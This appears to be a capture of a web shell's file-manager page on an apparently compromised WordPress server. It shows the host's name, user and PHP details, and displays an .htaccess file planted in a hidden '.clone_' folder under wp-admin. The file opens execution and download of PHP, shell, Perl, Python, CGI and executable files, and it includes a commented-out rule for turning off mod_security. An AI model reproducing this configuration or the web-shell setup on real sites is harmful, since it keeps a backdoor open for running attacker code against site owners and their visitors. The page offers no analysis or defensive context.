HEX
Server: Apache
System: Linux ruweb06.doruk.net.tr 6.8.0-79-generic #79-Ubuntu SMP PREEMPT_DYNAMIC Tue Aug 12 14:42:46 UTC 2025 x86_64
User: ilgazhavalandirma.com_lfvghapcl4 (11494)
PHP: 7.4.33
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/ilgazhavalandirma.com.tr/httpdocs/wp-admin/network/.clone_UjdrgAFp/.htaccess
# OVH Safe .htaccess - Allow common file types

# Prevent access to .htaccess itself
<Files .htaccess>
  Order allow,deny
  Deny from all
</Files>

# <IfModule mod_security.c>
#   SecFilterEngine Off
#   SecFilterScanPOST Off
# </IfModule>

<FilesMatch "\.(php|phps|php5|phtml|html|js|css|jpg|jpeg|png|gif|svg|webp|zip|rar|exe|sh|pl|py|cgi|txt|pdf)$">
  Order allow,deny
  Allow from all
</FilesMatch>

# php_flag engine on  # DO NOT USE ON OVH (causes 500 error)